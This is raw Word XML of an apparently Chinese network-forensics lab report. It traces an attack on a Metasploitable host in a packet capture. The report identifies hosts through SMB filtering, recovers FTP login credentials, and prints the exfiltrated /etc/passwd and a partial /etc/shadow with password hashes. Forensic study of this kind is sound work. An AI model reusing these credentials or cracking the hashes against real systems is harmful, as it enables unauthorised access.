    <w:p/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第二条是对第一条的回复，也就是告诉192.168.2.222那个WORKGROUP对应192.168.2.246。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="115570"/>
            <wp:effectExtent l="0" t="0" r="1905" b="635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图1.4</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="1116965"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1079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图1.5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/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bookmarkStart w:id="8" w:name="_Toc17763"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Ip+smb过滤</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p/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但是，并没有192.168.2.222的用户名，因此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们可以使用剩余的ip加之smb进行过滤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从中可以看到METASPLOITABLE对应着192.168.2.222。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5261610" cy="1947545"/>
            <wp:effectExtent l="0" t="0" r="1143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图1.6</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4815840" cy="434340"/>
            <wp:effectExtent l="0" t="0" r="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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc32286"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>browser.server过滤</w:t>
      </w:r>
      <w:bookmarkEnd w:id="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还一种更为简单的查询主机名的方法，直接通过过滤广播包来看主机名，其结果和上面的分析一致。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5272405" cy="949960"/>
            <wp:effectExtent l="0" t="0" r="635" b="1016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图1.7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/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bookmarkStart w:id="10" w:name="_Toc10826"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>用户名查询</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10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模仿案例1中过滤ftp-data报文的方法得到的结果没有如案例一样，只有一个压缩包被传输。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模仿案例2中利用网址进行分析的方法时，竟然发现https://packettotal.com网站上传上去之后就错误，无法进行分析。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5261610" cy="2109470"/>
            <wp:effectExtent l="0" t="0" r="11430" b="889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图1.8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/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bookmarkStart w:id="11" w:name="_Toc2841"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>流量追踪+数据导出</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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使用ftp-data看看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通过ftp传送了什么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，发现只有一个报文流1196。然后，往下看到1195。看到用户名：newuser和密码：anewuser，决定记录下来。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="298450"/>
            <wp:effectExtent l="0" t="0" r="3810" b="635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075430" cy="2289175"/>
            <wp:effectExtent l="0" t="0" r="8890" b="12065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图1.9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/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追踪TCP流的时候，显示的全是乱码，无法探知里面的信息。后来我查看一下原始数据。发现是1f8b0800开头，这是gzip的开头格式，因此可以直接以gzip的格式另存储。再将其解压缩后，发现里面有一个名为1的文件，打开得到图中结果。根据下面的结果192.168.2.183是获取信息的端口号。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5271135" cy="2713355"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1460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图1.10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5266055" cy="2284095"/>
            <wp:effectExtent l="0" t="0" r="6985" b="190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图1.11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4755515" cy="2927350"/>
            <wp:effectExtent l="0" t="0" r="14605" b="13970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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>图1.12</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc16229"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获得的/etc/passwd文件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用户名:口令:用户标识号:组标识号:注释性描述:主目录:登录Shell。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截取的/etc/passwd文件：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>etc/passwd                                                                                          0000644 0000000 0000000 00000003213 13654163220 011554  0                                                                                                    ustar   root                            root                                                                                                                                                                                                                   root:x:0:0:root:/root:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>daemon:x:1:1:daemon:/usr/sbin:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bin:x:2:2:bin:/bin:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sys:x:3:3:sys:/dev:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sync:x:4:65534:sync:/bin:/bin/sync</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>games:x:5:60:games:/usr/games:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>man:x:6:12:man:/var/cache/man:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lp:x:7:7:lp:/var/spool/lpd:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mail:x:8:8:mail:/var/mail:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>news:x:9:9:news:/var/spool/news:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>proxy:x:13:13:proxy:/bin:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>www-data:x:33:33:www-data:/var/www:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>backup:x:34:34:backup:/var/backups:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>list:x:38:38:Mailing List Manager:/var/list:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>irc:x:39:39:ircd:/var/run/ircd:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nobody:x:65534:65534:nobody:/nonexistent:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>libuuid:x:100:101::/var/lib/libuuid:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dhcp:x:101:102::/nonexistent:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>syslog:x:102:103::/home/syslog:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>klog:x:103:104::/home/klog:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bind:x:105:113::/var/cache/bind:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>postfix:x:106:115::/var/spool/postfix:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ftp:x:107:65534::/home/ftp:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>distccd:x:111:65534::/:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>user:x:1001:1001:just a user,111,,:/home/user:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>service:x:1002:1002:,,,:/home/service:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>telnetd:x:112:120::/nonexistent:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>proftpd:x:113:65534::/var/run/proftpd:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>statd:x:114:65534::/var/lib/nfs:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>myuser:x:1003:1003:,,,:/home/myuser:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>newuser:x:1004:1004:,,,:/home/newuser:/bin/bash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etc/shadow                                                                                          0000640 0000000 0000052 00000002462 13654163214 012055  0                                                                                                    ustar   root                            shadow                                                                                                                                                                                                                 root:$1$AEvN/LAF$UE4aDFyWJa.AzVZkDnflq0:18387:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>daemon:*:14684:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bin:*:14684:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sync:*:14684:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>games:*:14684:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>man:*:14684:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lp:*:14684:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mail:*:14684:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>news:*:14684:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>uucp:*:14684:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>proxy:*:14684:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>www-data:*:14684:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>backup:*:14684:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>list:*:14684:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>irc:*:14684:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gnats:*:14684:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nobody:*:14684:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>libuuid:!:14684:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dhcp:*:14684:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>syslog:*:14684:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sshd:*:14684:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>msfadmin:$1$XyONoYvl$yiPDyTSNCkbiqVqm4B/uX/:18387:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bind:*:14685:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>postfix:*:14685:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ftp:*:14685:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql:!:14685:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tomcat55:*:14691:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>distccd:*:14698:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
